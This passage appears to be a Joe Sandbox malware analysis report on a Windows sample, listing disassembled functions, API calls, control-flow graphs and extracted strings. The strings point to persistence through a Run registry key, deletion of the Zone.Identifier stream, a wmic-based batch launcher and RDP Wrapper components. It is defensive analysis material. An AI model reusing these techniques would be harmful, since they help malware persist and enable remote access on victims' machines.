13148->13155 13150 409ab7 13151 409ad1 13150->13151 13152 40362d 3 API calls 13150->13152 13153 409aca 13152->13153 13154 410203 5 API calls 13153->13154 13154->13151 13155->13150

                                                Executed Functions

                                                Function 0041290F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138comCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 272 41290f-412949 CoInitialize CoCreateInstance 273 412a66-412a6a 272->273 274 41294f-41295b 272->274 275 41295f-412964 274->275 275->273 276 41296a-412972 275->276 278 412a22-412a3a 276->278 280 412a40-412a45 278->280 281 412977-412990 278->281 282 412a50-412a55 280->282 283 412a47-412a4d 280->283 281->280 287 412996-4129b5 VariantInit 281->287 284 412a60 CoUninitialize 282->284 285 412a57-412a5d 282->285 283->282 284->273 285->284 291 4129b7-4129cc 287->291 292 4129ce-4129d8 call 405f53 287->292 291->280 291->292 296 4129e5 292->296 297 4129da-4129e3 call 412bc7 292->297 299 4129e7-4129f0 296->299 297->299 301 412a10-412a20 call 402481 299->301 302 4129f2 299->302 301->278 303 4129f4-412a0e 302->303 303->301 303->303
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0041291E
                                                • CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?), ref: 0041293E
                                                • VariantInit.OLEAUT32(?), ref: 0041299A
                                                • CoUninitialize.OLE32 ref: 00412A60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                • String ID: Description$FriendlyName${"A
                                                • API String ID: 4142528535-3386164859
                                                • Opcode ID: 41416dd24b6a70c272352c672e471ccd647f62b4558b7517a081743fcdaded27
                                                • Instruction ID: b2376c0ef89459fb158d6637b516917a8c550e77e28d33a2766e49f6da73c98f
                                                • Opcode Fuzzy Hash: 41416dd24b6a70c272352c672e471ccd647f62b4558b7517a081743fcdaded27
                                                • Instruction Fuzzy Hash: 8D412D74B00209AFCB24DFA5C944DEFBBB9EF84744B14845EE446EB250DB74DA81CB64
                                                Function 00401085 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 491 401085-401098 GetProcessHeap RtlAllocateHeap
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateProcess
                                                • String ID:
                                                • API String ID: 1357844191-0
                                                • Opcode ID: 2ce1b78a034ac1476b0e63f24973bc94a1c952517539569c7485caeabb8436b8
                                                • Instruction ID: a18a2fe82ce61e382abdac33cea282e384ee883724b83e466bfc4f852b53c720
                                                • Opcode Fuzzy Hash: 2ce1b78a034ac1476b0e63f24973bc94a1c952517539569c7485caeabb8436b8
                                                • Instruction Fuzzy Hash: 1AB01231444200FBCF001BE09D0CF493B28ABD4713F00C410F205C1060C6314080DB15
                                                Function 00413435 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 188registrystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00413467
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00413483
                                                  • Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                  • Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                  • Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                  • Part of subcall function 00411E21: CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004134EA
                                                • GetLastError.KERNEL32 ref: 004134F5
                                                • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0041352F
                                                • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 0041354E
                                                • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00413563
                                                • RegCloseKey.ADVAPI32(?), ref: 00413569
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004135C5
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004135D8
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004135E7
                                                  • Part of subcall function 00411A3C: GetModuleFileNameW.KERNEL32(00000000,0054CBF0,00000208,00000000,00000000,?,?,?,004057B9,?,00000000,00000000), ref: 00411A58
                                                  • Part of subcall function 00411A3C: IsUserAnAdmin.SHELL32 ref: 00411A5E
                                                  • Part of subcall function 00411A3C: FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A87
                                                  • Part of subcall function 00411A3C: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A91
                                                  • Part of subcall function 00411A3C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A9B
                                                  • Part of subcall function 00411A3C: LockResource.KERNEL32(00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00411AA2
                                                  • Part of subcall function 00411136: CopyFileW.KERNEL32 ref: 004111D7
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00410BD9: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410C14
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                • MaxConnectionsPer1_0Server, xrefs: 00413545
                                                • MaxConnectionsPerServer, xrefs: 0041355A
                                                • \Microsoft Vision\, xrefs: 004135CB
                                                • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00413525
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Create$Resource$CloseHeapModuleNameProcessValue$AdminAllocateCopyCountDirectoryErrorEventFindFolderFreeHandleLastLoadLockPathReadSizeSizeofTickUserVirtuallstrcatlstrcpy
                                                • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                • API String ID: 3138263686-2552559493
                                                • Opcode ID: 8f8f2317da5b9e5fa14dcb112acfbae29173916546146f8abef70ac2aff62589
                                                • Instruction ID: dbdc3006eb0d495d609ceabf26601cc7b31dd9cbe7e190f3516bfb7783b9e381
                                                • Opcode Fuzzy Hash: 8f8f2317da5b9e5fa14dcb112acfbae29173916546146f8abef70ac2aff62589
                                                • Instruction Fuzzy Hash: 586151B1408344AFD720EF61DC85EEB77A8EB94709F00493FF68592191DB389A84CB5A
                                                Function 0040E703 Relevance: 25.6, APIs: 1, Strings: 16, Instructions: 121COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(0054E020), ref: 0040E710
                                                  • Part of subcall function 00405F53: GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,770113FB,00000000,00405A34), ref: 00405F56
                                                  • Part of subcall function 00405F53: HeapAlloc.KERNEL32(00000000), ref: 00405F5D
                                                  • Part of subcall function 004031D4: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403207
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                • String ID: T$%ProgramFiles%$%ProgramW6432%$%windir%\System32$HT$TermService$TT$XT$XT$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll$\T$`T$`T
                                                • API String ID: 2811233055-1205521688
                                                • Opcode ID: f9b1b9232c83a8c199dd21051ed52d462c2c0b87d5572563570c9f3229b83852
                                                • Instruction ID: b80cf716516139d3339e325f9bbf42a43c60d761a4303312119ab15767051eb6
                                                • Opcode Fuzzy Hash: f9b1b9232c83a8c199dd21051ed52d462c2c0b87d5572563570c9f3229b83852
                                                • Instruction Fuzzy Hash: 8531E370B0020067D715BF3688575AE3EADBBA670D710043FB00A7B2D1CFBC5A4A9759
                                                Function 00411136 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 278fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040F481: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,00413589,?,00411618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040F4A2
                                                  • Part of subcall function 00410F6E: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 00410F8E
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                • CopyFileW.KERNEL32 ref: 004111D7
                                                  • Part of subcall function 0041106C: RegCreateKeyExW.ADVAPI32(770113FB,00000000,00000000,00000000,00000000,00413589,00000000,?,?), ref: 004110A0
                                                  • Part of subcall function 0041106C: RegOpenKeyExW.KERNEL32 ref: 004110BB
                                                  • Part of subcall function 00411039: RegSetValueExW.KERNEL32 ref: 00411058
                                                • SHGetKnownFolderPath.SHELL32(00414550,00000000,00000000,?), ref: 00411264
                                                • CopyFileW.KERNEL32 ref: 00411382
                                                  • Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 0040F71F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040F725
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,770113FB,00000000), ref: 0041147C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                                • API String ID: 2154703971-4169938573
                                                • Opcode ID: 9264aadb901635ff11eb2832a92e62d21b073e3772fda62fef43ad282729040f
                                                • Instruction ID: 88c4e093d6dd73737c3aa0ee0195710feb8f01d0cf8726b165cb43df6b0fd163
                                                • Opcode Fuzzy Hash: 9264aadb901635ff11eb2832a92e62d21b073e3772fda62fef43ad282729040f
                                                • Instruction Fuzzy Hash: 75A12E71900109ABDF15EFA2C8929EE7B79AF94304B10406FB912771D2DF38AA45CB59
                                                Function 00405CE2 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 306 405ce2-405cf5 GetCommandLineA 307 405cf7-405cfc 306->307 308 405d1f-405d21 306->308 311 405cfe 307->311 312 405d0f-405d1a 307->312 309 405d23 308->309 310 405d1c-405d1d 308->310 313 405d2c-405d2e 309->313 310->308 314 405d00-405d04 311->314 315 405d2a 312->315 316 405d30-405d69 GetStartupInfoA call 405d70 call 405d9d GetModuleHandleA call 413435 call 405d85 ExitProcess 313->316 317 405d25-405d27 313->317 314->312 318 405d06-405d0d 314->318 315->313 317->316 319 405d29 317->319 318->312 318->314 319->315
                                                APIs
                                                • GetCommandLineA.KERNEL32 ref: 00405CE9
                                                • GetStartupInfoA.KERNEL32 ref: 00405D38
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00405D54
                                                • ExitProcess.KERNEL32 ref: 00405D69
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                • String ID:
                                                • API String ID: 2164999147-0
                                                • Opcode ID: eacdaa668cf48abf2a89799ff968949de2d2c2fd9d0224425ece3e2bc3c99383
                                                • Instruction ID: b91b949f87cc3387e5335cb440a95d827ed93168e94d9b44a33dce71b5c9a03c
                                                • Opcode Fuzzy Hash: eacdaa668cf48abf2a89799ff968949de2d2c2fd9d0224425ece3e2bc3c99383
                                                • Instruction Fuzzy Hash: 700108341045442ED7242F74B44D6EB3B66DF56308B64907BE482A7292DA3E0C478E6D
                                                Function 00411E21 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 328 411e21-411e59 call 401085 CreateFileA 331 411e5b 328->331 332 411e5e-411e7a GetFileSize ReadFile 328->332 331->332 333 411e7c 332->333 334 411e7e-411e8b CloseHandle 332->334 333->334
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                • CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                • String ID:
                                                • API String ID: 2517252058-0
                                                • Opcode ID: 9cf9e135969d03e2678d2257f49f57b78742e56c31193f2db14f718b692a2705
                                                • Instruction ID: fb363df85bf2d9b02997f9a86bc51ba312390ffbc8cf422f0c30554d498563d0
                                                • Opcode Fuzzy Hash: 9cf9e135969d03e2678d2257f49f57b78742e56c31193f2db14f718b692a2705
                                                • Instruction Fuzzy Hash: 14F044B17112107FF3205B65AC09FFB769CDB55765F204135FA51E31D0E7B45D4086A8
                                                Function 0040FBFC Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 335 40fbfc-40fc1d GetCurrentProcess OpenProcessToken 336 40fc3f-40fc43 335->336 337 40fc1f-40fc3b GetTokenInformation 335->337 338 40fc45-40fc48 CloseHandle 336->338 339 40fc4e-40fc57 336->339 337->336 338->339
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                • CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                • String ID:
                                                • API String ID: 215268677-0
                                                • Opcode ID: eaaaab6a576d5f26a59590c60b8529498a75a5c6e6a24e5c90d3c3744da6f4b8
                                                • Instruction ID: 6fb553a7aa8bf3ab883ff7ebc2a7e6bb744be305b0f627636a4dbb5773bb8036
                                                • Opcode Fuzzy Hash: eaaaab6a576d5f26a59590c60b8529498a75a5c6e6a24e5c90d3c3744da6f4b8
                                                • Instruction Fuzzy Hash: 69F0F972D00218FBEB159BA1DD0ABDEBBB8EF48741F118075EA01F6190D7749F48DA94
                                                Function 00405A10 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 156sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNEL32(000001F4,00000000,770113FB,00000000), ref: 00405A26
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,770113FB,?,00405A4F,h\HA,00000000), ref: 004033C8
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
                                                  • Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                • String ID: h\HA$x5A
                                                • API String ID: 277671435-3533286509
                                                • Opcode ID: a0a32ffcd60a2a27e8a9ca45942fdf65d511605c6e2090140c324c1d5c973fcf
                                                • Instruction ID: 145e88e604e1605710be084c022a5ad4a2708462876eee3a1dbc8bb2c1383742
                                                • Opcode Fuzzy Hash: a0a32ffcd60a2a27e8a9ca45942fdf65d511605c6e2090140c324c1d5c973fcf
                                                • Instruction Fuzzy Hash: A8517475900149AFCB14EFA1D8D18EEBBB9AF44308B1001BED456AB296DF34BB45CF94
                                                Function 00410BD9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 472 410bd9-410c1c call 401052 CreateProcessW 475 410c28 472->475 476 410c1e-410c26 472->476 477 410c2a-410c2d 475->477 476->477
                                                APIs
                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410C14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: D
                                                • API String ID: 963392458-2746444292
                                                • Opcode ID: 451e23ddb324b2de80a69945d0f840c442f30f70cf82a4394689fd4c81255151
                                                • Instruction ID: 82a8d4061ff8ab460014f0dac3b8f7e5c96f6469208adc2169ecf078a3b76cf7
                                                • Opcode Fuzzy Hash: 451e23ddb324b2de80a69945d0f840c442f30f70cf82a4394689fd4c81255151
                                                • Instruction Fuzzy Hash: CEF036B1600109AFD700DFD4CC85DEB77BCEB45348B008935F6469B250E6749D488B64
                                                Function 0041106C Relevance: 3.0, APIs: 2, Instructions: 47registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 478 41106c-41107c 479 4110b1-4110c3 RegOpenKeyExW 478->479 480 41107e-41108a call 40f731 478->480 481 4110c5-4110c6 479->481 482 4110c8 479->482 480->479 486 41108c-4110a8 RegCreateKeyExW 480->486 484 4110ca-4110ce 481->484 482->484 486->482 487 4110aa-4110ac call 410fae 486->487 487->479
                                                APIs
                                                • RegOpenKeyExW.KERNEL32 ref: 004110BB
                                                  • Part of subcall function 0040F731: RegOpenKeyExW.ADVAPI32 ref: 0040F747
                                                • RegCreateKeyExW.ADVAPI32(770113FB,00000000,00000000,00000000,00000000,00413589,00000000,?,?), ref: 004110A0
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$CloseCreate
                                                • String ID:
                                                • API String ID: 1752019758-0
                                                • Opcode ID: 493710888fd6b06008087cf37a446b5d0cd482525da294b3161cbeeb0c1e5a8f
                                                • Instruction ID: 647549b5581b6afbdfecbf6355b0432e600c928c37604508df28fb6808740c6e
                                                • Opcode Fuzzy Hash: 493710888fd6b06008087cf37a446b5d0cd482525da294b3161cbeeb0c1e5a8f
                                                • Instruction Fuzzy Hash: DB016D7160114DBFAB108F92DC80DFB3F6EEF48398710403AFA0582220E7758DE19AA9
                                                Function 00411D0C Relevance: 3.0, APIs: 2, Instructions: 14sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 489 411d0c-411d34 Sleep GetTickCount
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountSleepTick
                                                • String ID:
                                                • API String ID: 2804873075-0
                                                • Opcode ID: b4ca311bf0cb1c45a44abb39bfeb90d6ab341e64d914aacf874c56c19a1ff2f5
                                                • Instruction ID: bc16fd327cf67d43f179a3bc3a933e895663b38586298b374b7f5ce74d885f03
                                                • Opcode Fuzzy Hash: b4ca311bf0cb1c45a44abb39bfeb90d6ab341e64d914aacf874c56c19a1ff2f5
                                                • Instruction Fuzzy Hash: 24D022303481046FE30C9B09FC4E2A13E4EE7E0345F04C03BF50EC90E0CDB056A04448
                                                Function 00410283 Relevance: 3.0, APIs: 2, Instructions: 8synchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 490 410283-410297 ReleaseMutex CloseHandle
                                                APIs
                                                • ReleaseMutex.KERNEL32(?,?,0040FEFD,x5A,00405BEC,x5A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,h\HA), ref: 00410288
                                                • CloseHandle.KERNEL32(?), ref: 00410290
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleMutexRelease
                                                • String ID:
                                                • API String ID: 4207627910-0
                                                • Opcode ID: e8ea245e333d34bfb270a1424a8c5bfa333d1f7079b1e1b36508f6edab6d53e3
                                                • Instruction ID: db4c74b9d13bc5dced64540ca7ba47584a69d0e5ed2af3a6983ff5975521201b
                                                • Opcode Fuzzy Hash: e8ea245e333d34bfb270a1424a8c5bfa333d1f7079b1e1b36508f6edab6d53e3
                                                • Instruction Fuzzy Hash: DAB0927A001020EFEB252F94FC0C8D4BFA5FF8839131584BAF18182038CBB20CA09B84
                                                Function 00405EFF Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 492 405eff-405f0f GetProcessHeap RtlAllocateHeap
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?,00402FA7,BZ@,?,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F02
                                                • RtlAllocateHeap.NTDLL(00000000,?,004103FD,BZ@,00405D61,?,770113FB,00000000,?,00405A42,00000000), ref: 00405F09
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateProcess
                                                • String ID:
                                                • API String ID: 1357844191-0
                                                • Opcode ID: 6e63da2cd5404a95ce3de0fc3d2ddc78c3798c6b7392df3f8f4f485ec6ea96fa
                                                • Instruction ID: 0f67cddd9260aca77cc4e682daa7515305fd7a4cbe710e6bd9b137e8dc649acc
                                                • Opcode Fuzzy Hash: 6e63da2cd5404a95ce3de0fc3d2ddc78c3798c6b7392df3f8f4f485ec6ea96fa
                                                • Instruction Fuzzy Hash: 63A00271550101BBDE4457E49D4DF55361CA7D5712F01C554B545C5050D96554848725
                                                Function 0040309D Relevance: 2.6, APIs: 2, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040308C: lstrlenA.KERNEL32(00000000,004030B4,770113FB,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB,?,0040350E,00000000,?,00000000), ref: 00403093
                                                • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,770113FB,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB), ref: 004030CA
                                                  • Part of subcall function 00405E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB,?,0040350E,00000000), ref: 004030F5
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
